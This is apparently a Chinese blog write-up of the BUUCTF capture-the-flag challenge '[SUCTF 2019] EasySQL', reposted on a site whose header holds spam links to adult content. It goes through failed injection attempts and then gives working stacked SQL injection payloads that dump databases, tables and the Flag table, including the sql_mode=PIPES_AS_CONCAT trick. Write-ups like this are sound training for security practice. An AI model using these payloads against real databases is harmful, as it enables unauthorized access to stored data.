日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

BUUCTF-WEB:[SUCTF 2019]EasySQL 1

發(fā)布時間:2025/3/15 数据库 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 BUUCTF-WEB:[SUCTF 2019]EasySQL 1 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

解題思路:

①先試試1'# 發(fā)現(xiàn)沒有回顯
②試試1? 有回顯

③試試單引號注入

④試試用order by查詢表的列數(shù):1 order by 1

用不了聯(lián)合注入了!

下面嘗試使用堆疊注入:
payload:1;show databases;#

payload:1;show tables;#

payload:1;show columns from Flag;#(查詢Flag表中的列)

到這一步,堆疊注入也沒辦法得出flag

既然同時他也沒有報錯信息,那報錯注入也不用太考慮了。
1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)#????? 【nonono】
試下布爾盲住,結(jié)果發(fā)現(xiàn)不管怎么樣都是返回nonono,就連數(shù)據(jù)庫長度大于1這種探針都返回nonono,那基本可以放棄布爾盲注了。

小菜雞做不出來了。。。

接下來是網(wǎng)上的兩種解法,參照了網(wǎng)上大佬們的WP

解法1、
1)第一種是猜出了源碼select $_POST[‘query’] || flag from Flag,

sql_mode 設(shè)置了 PIPES_AS_CONCAT 時,|| 就是字符串連接符,相當于CONCAT() 函數(shù)
當 sql_mode 沒有設(shè)置 PIPES_AS_CONCAT 時 (默認沒有設(shè)置),|| 就是邏輯或,相當于OR函數(shù)
第一種就按默認沒有配置來進行,此時||就是邏輯或
||在命令執(zhí)行中見過,
回顧:
command1;command2順序執(zhí)行
command1 || command2
如果command1執(zhí)行失敗,則執(zhí)行command2
command1 && command2
如果command1執(zhí)行成功,則執(zhí)行command2

因此只需要將

$_POST[‘query’]

提交的數(shù)據(jù)換成*,1(如果直接寫的話會被報錯,且寫在后面會失效)
解釋:
sql=select.post[‘query’]."||flag from Flag";(拼接語句)
如果$post[‘query’]的數(shù)據(jù)為

*,1

sql語句就變成了select *,1||flag from Flag,
就是select *,1 from Flag,這樣就直接查詢出了Flag表中的所有內(nèi)容。
此處的1是臨時增加一列,列名為1且這一列的所有值都為1

執(zhí)行payload:*,1

解法2、
(2)第二種是將||作為字符串連接符,因此需要在語句中更改其配置
sql_mode=PIPES_AS_CONCAT時即可
Payload:1;set sql_mode=PIPES_AS_CONCAT;select 1
拼接完之后:select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag
相當于是select 1 from Flag和select flag from Flag

?

?

總結(jié)

以上是生活随笔為你收集整理的BUUCTF-WEB:[SUCTF 2019]EasySQL 1的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。